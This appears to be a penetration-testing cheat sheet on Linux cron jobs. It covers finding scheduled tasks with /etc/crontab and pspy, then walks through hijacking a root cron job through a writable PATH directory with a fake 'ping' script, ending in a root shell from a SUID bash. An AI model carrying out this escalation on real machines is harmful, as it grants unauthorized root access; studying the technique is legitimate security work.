Cron
Detect
Global (All Users)
Check Tasks
cat /etc/crontab
No Global (User)
Check Tasks
Pspy
https://github.com/DominicBreuker/pspy
low@vulnyx:~$ cd /dev/shm
low@vulnyx:/dev/shm$ wget -q --no-check-certificate "https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64"
low@vulnyx:/dev/shm$ chmod +x pspy64
low@vulnyx:/dev/shm$ ./pspy64
Bash
#!/bin/bash
old=$(ps -eo command)
filter="kworker|command|defunct"
function ctrl_c(){
exit 1
}
trap ctrl_c int
while true; do
new=$(ps -eo command)
diff <(echo "$old") <(echo "$new") | grep "[\>\<]" | grep -vE "$filter"
old=$new
done
Cron Hijacking
Check Tasks
pi@raspberry:~ $ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/var/www/html:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root ping -c1 raspberrypi.com
pi@raspberry:~ $ which ping
/usr/bin/ping
pi@raspberry:~ $ grep "PATH" /etc/crontab |sed 's/PATH=//; s/:/\n/g'
/usr/local/sbin
/usr/local/bin
/sbin
/var/www/html
/bin
/usr/sbin
/usr/bin
pi@raspberry:~ $ ls -l /var/www/
total 4
drwxrwxrwx 2 www-data www-data 4096 ene 7 2024 html
Abuse
pi@raspberry:~ $ which bash chmod
/usr/bin/bash
/usr/bin/chmod
pi@raspberry:~ $ ls -l /usr/bin/bash
-rwxr-xr-x 1 root root 1367848 mar 27 2022 /usr/bin/bash
pi@raspberry:~ $ echo '/usr/bin/chmod 4755 /usr/bin/bash' >/var/www/html/ping
pi@raspberry:~ $ /usr/bin/chmod +x /var/www/html/ping
pi@raspberry:~ $ ls -l /bin/bash
-rwsr-xr-x 1 root root 1367848 mar 27 2022 /bin/bash
pi@raspberry:~ $ /bin/bash -pi
bash-5.1# id ; hostname
uid=1000(pi) gid=1000(pi) euid=0(root) grupos=1000(pi)
raspberry